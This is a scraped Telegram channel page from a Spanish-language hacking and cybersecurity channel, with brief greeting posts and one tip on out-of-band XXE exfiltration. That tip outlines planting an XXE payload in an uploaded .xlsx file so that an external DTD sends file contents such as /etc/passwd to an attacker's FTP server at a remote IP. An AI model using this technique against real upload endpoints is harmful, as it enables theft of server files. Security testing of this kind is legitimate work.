tpx Security ⠠⠵
2.4K subscribers
2.31K photos
103 videos
24 files
3.97K links
Hacking, ciberseguridad e Inteligencia.
Download Telegram
Wow !
Recuerden no hay pretextos !! Aprender es fácil con internet a la mano </lol>
#Congreso #Hacking !! Colombia 🇨🇴
Buen Viernes !
Exfiltration through FTP using OOB XXE

Upload accepts .xlsx files --> Unzip sample .xlsx file -> add payload in workbook.xml/[Content_Types].xml after xml declaration --> DTD file send data via ftp://remote-ip/%data --> run ftp server using xxe-ftp-server.rb --> /etc/passwd

Via: https://twitter.com/_ayoubfathi_/status/1164536885244583941